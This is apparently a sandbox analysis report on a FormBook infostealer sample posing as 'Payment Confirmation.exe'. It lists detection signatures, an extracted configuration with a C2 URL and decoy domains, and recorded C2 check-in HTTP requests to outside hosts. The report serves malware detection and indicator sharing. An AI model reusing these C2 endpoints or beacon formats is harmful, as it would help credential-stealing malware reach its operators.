Windows Analysis Report Payment Confirmation.exe

Overview

General Information

Sample Name: Payment Confirmation.exe
Analysis ID: 502129
MD5: 98ffc3c812e6cec919ebd286973e2002
SHA1: b0d1a65445a7923870ad23ec4d80f592e808c987
SHA256: 014d0ece0d472eaea73698d634308303ddb9f227f39d339a66416c3cb744d2c1
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

AV Detection:

Found malware configuration
Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}
Multi AV Scanner detection for submitted file
Source: Payment Confirmation.exe Virustotal: Detection: 24%
Source: Payment Confirmation.exe ReversingLabs: Detection: 20%
Yara detected FormBook
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for domain / URL
Source: www.thesewhitevvalls.com Virustotal: Detection: 6%
Machine Learning detection for sample
Source: Payment Confirmation.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.Payment Confirmation.exe.2320000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.msiexec.exe.49f796c.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.Payment Confirmation.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.1.Payment Confirmation.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: Payment Confirmation.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: msiexec.pdb source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
Source: Binary string: msiexec.pdbGCTL source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000001.00000003.364311124.000000000F080000.00000004.00000001.sdmp, Payment Confirmation.exe, 00000004.00000002.437196803.0000000000960000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, msiexec.exe
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00405E93 FindFirstFileA,FindClose, 1_2_00405E93
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_004054BD
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00402671 FindFirstFileA, 1_2_00402671

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.206.159.80 80
Source: C:\Windows\explorer.exe Network Connect: 45.91.80.182 80
Source: C:\Windows\explorer.exe Domain query: www.thesewhitevvalls.com
Source: C:\Windows\explorer.exe Domain query: www.lumberjackguitarloops.com
Source: C:\Windows\explorer.exe Domain query: www.elliotpioneer.com
Source: C:\Windows\explorer.exe Domain query: www.carts-amazon.com
Source: C:\Windows\explorer.exe Domain query: www.chinaopedia.com
Source: C:\Windows\explorer.exe Network Connect: 3.223.115.185 80
Source: C:\Windows\explorer.exe Domain query: www.anadolu.academy
Source: C:\Windows\explorer.exe Domain query: www.playstarexch.com
Source: C:\Windows\explorer.exe Network Connect: 172.105.103.207 80
Source: C:\Windows\explorer.exe Network Connect: 62.210.5.81 80
Source: C:\Windows\explorer.exe Domain query: www.altitudebc.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 94.73.147.156 80
Source: C:\Windows\explorer.exe Domain query: www.unasolucioendesa.com
Source: C:\Windows\explorer.exe Domain query: www.atp-cayenne.com
Source: C:\Windows\explorer.exe Network Connect: 82.98.134.154 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.thesewhitevvalls.com/b2c0/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASIANETGB
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1 Host: www.playstarexch.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1 Host: www.anadolu.academy Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1 Host: www.altitudebc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1 Host: www.unasolucioendesa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1 Host: www.elliotpioneer.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1 Host: www.thesewhitevvalls.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1 Host: www.lumberjackguitarloops.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1 Host: www.carts-amazon.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1 Host: www.chinaopedia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1 Host: www.atp-cayenne.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.206.159.80
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Oct 2021 14:32:21 GMT Content-Type: text/html Content-Length: 275 ETag: "615f93b1-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1237 Date: Wed, 13 Oct 2021 14:32:26 GMT Server: LiteSpeed Vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Oct 2021 14:32:42 GMT Content-Type: text/html Content-Length: 275 ETag: "615f93b1-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Oct 2021 14:33:00 GMT Content-Type: text/html Content-Length: 275 ETag: "615f93b1-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: Payment Confirmation.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Payment Confirmation.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: msiexec.exe, 0000000B.00000002.630481531.0000000004B72000.00000004.00020000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
Source: unknown DNS traffic detected: queries for: www.playstarexch.com
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1 Host: www.playstarexch.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1 Host: www.anadolu.academy Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1 Host: www.altitudebc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1 Host: www.unasolucioendesa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1 Host: www.elliotpioneer.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1 Host: www.thesewhitevvalls.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1 Host: www.lumberjackguitarloops.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1 Host: www.carts-amazon.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1 Host: www.chinaopedia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1 Host: www.atp-cayenne.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: Payment Confirmation.exe, 00000001.00000002.366842319.00000000007FA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00404FC2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
